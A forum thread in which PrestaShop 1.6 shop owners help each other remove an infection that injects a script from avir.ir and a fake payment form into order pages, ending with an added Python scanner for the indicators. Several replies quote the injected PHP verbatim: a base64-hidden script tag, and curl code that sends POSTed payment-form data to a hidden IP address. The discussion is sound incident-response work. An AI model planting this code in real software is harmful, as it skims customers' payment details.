
Order pages calling a malicious script "favicon.js"


Joseph Joestar

Posted (edited)

Hello

In the source code of the order pages of my PrestaShop 1.6 website, I found a script tag that is calling a malicious script:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> 
<!DOCTYPE HTML> 
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]-->
<!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]-->
<!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]-->
<!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]-->
<html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman   ......

This script changes the DOM and adds an undesirable payment form after the PAYMENT HOOK (I hid this form with CSS to prevent my customers from seeing and using it).

Is anyone having this same issue?

The problem seems pretty complex after 2 days of investigation, searching through all my files and all my DB without finding anything interesting.


Edited by Joseph Joestar

Yep, it happened to me as well a few days ago on PrestaShop 1.6.

Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this, and remove it:

$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

or at the end

try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

It's an injection, but I still don't know where it came from (PrestaShop core breach? module?)... it's really bad anyway.

  • 3 weeks later...
Posted (edited)

On 3/26/2021 at 4:47 PM, Indy80 said:

Yep, it happened to me as well a few days ago on PrestaShop 1.6.

Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this, and remove it:


$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

or at the end


try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

It's an injection, but I still don't know where it came from (PrestaShop core breach? module?)... it's really bad anyway.

I found and removed those lines exactly where you said.

Where can I check and clean the rest of the website?

It seems I have more, as I see in tests here https://sitecheck.sucuri.net and here https://scanner.pcrisk.com, and they are all related to "Detected reference to malicious blacklisted domain www.avir.ir".

I also found an infection in AdminLoginController.php as mentioned here; should I delete it?

$ch = curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));

EDIT: My hosting just informed me that cartabandonmentpro was the reason. I had it installed but never enabled; now deleted, of course.

Edited by YanK1973

  • 3 weeks later...

Hello,

I have the same problem with this favicon.js script. I removed all lines of code from the files mentioned here and even more (I searched for those keywords in all files in the shop). Unfortunately the fake payment form still exists, and so does this:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script>

😒

Anyone have a clue how to find it?


Hi,

Have you checked if the script was somehow added from the database?

Also try disabling overrides and disabling non-PrestaShop modules, as there is a chance that the code is being added by some module if it's not the database.

Also, could you send me the URL of your shop in PM to me so I can check, maybe I can give you some clue where to search it.

Kind regards, Leo


32 minutes ago, Prestachamps said:

Hi,

As I see, the script is being added into your footer.tpl; please check your theme's footer.tpl.

Kind regards, Leo

The script is probably added dynamically by some other script; there is nothing in the footer.tpl. That was the first place I looked at :)

Hi,

To check if it's from the DB, export a database dump from your cPanel, open the dump in a text editor, and search for "favicon.js" or for "avir.ir".

Kind regards, Leo


I have exactly the same issue on PS 1.6.1.23 version. I've cleaned the files mentioned in this thread but the offending JS code still appears. I uploaded clean files from the same version of PS. Still the problem exists.

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> definitely seems dynamically created / loaded, as it does not appear in the theme's header or footer tpl files. I've also looked in other tpl files just in case, but no luck.

Has anyone had success in removing the offending code - and its source to prevent re-infection, if so how? Please share as it would be really helpful to me - and no doubt others as this seems to be an exploit being run against PS in particular. I haven't come across similar threads or articles in relation to other e-commerce software.

A scan against a backup of the db files did not reveal any reference to "avir" or "avir.ir" or the base64_encoded string.

I am desperate for a solution if anyone has further ideas / insights.

Many thanks!


Update - I think I may have won this round - so perhaps what follows might help someone else facing a similar issue:

I took the full script tag ==> <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> and base64-encoded it, which revealed this => PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=

I scanned all files on the server for that string and found one further file which seemed to contain the offending code: /controllers/front/ParentOrderController.php

Replacing that file with a clean copy seemed to have done the trick. 

Hope this helps someone else...

Cheers
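The two search strategies in this thread (Leo's plaintext search of a database dump, and the last poster's search for the base64 form of the script tag) can be combined into one offline scan. The script below is an added example, not code from the thread or from PrestaShop: it walks a copy of the shop (PHP, .tpl and an exported .sql dump), looks for the plaintext indicators quoted above, and also decodes every `base64_decode('...')` literal it finds and flags any that turn out to be a script tag, a URL or a curl call, so a freshly re-encoded variant is still caught. Function and constant names are my own.

```python
import base64
import os
import re

# Plaintext indicators quoted in the thread.
PLAIN_INDICATORS = ("avir.ir", "favicon.js")

# base64_decode('...') or base64_decode("...") with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")

# What makes a decoded literal suspicious in a shop's PHP: markup, a URL or curl.
SUSPICIOUS_DECODED = re.compile(r"<script|https?://|curl_init", re.IGNORECASE)


def decode_literal(literal: str) -> str:
    """Decode a base64 literal; return '' if it is not valid base64."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def scan_text(text: str) -> list:
    """Return (kind, evidence, decoded) findings for one file's contents."""
    findings = []
    for ind in PLAIN_INDICATORS:
        if ind in text:
            findings.append(("plaintext", ind, ""))
    for m in B64_CALL.finditer(text):
        decoded = decode_literal(m.group(2))
        if decoded and SUSPICIOUS_DECODED.search(decoded):
            findings.append(("base64", m.group(2)[:40] + "...", decoded))
    return findings


def scan_tree(root: str, exts=(".php", ".tpl", ".sql")) -> dict:
    """Walk a shop export and map each file path to its findings (if any)."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample mimicking the injected line quoted in the thread.
SAMPLE_INFECTED = ("$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0"
                   "L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZp"
                   "Y29uLmpzIj48L3NjcmlwdD4=');")
SAMPLE_CLEAN = "$greeting = base64_decode('aGVsbG8=');"  # decodes to 'hello'
```

Run `scan_tree("/path/to/shop-copy")` on an offline copy that also contains the SQL dump; every flagged file should be compared against a clean copy of the same PrestaShop version before anything is deleted.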
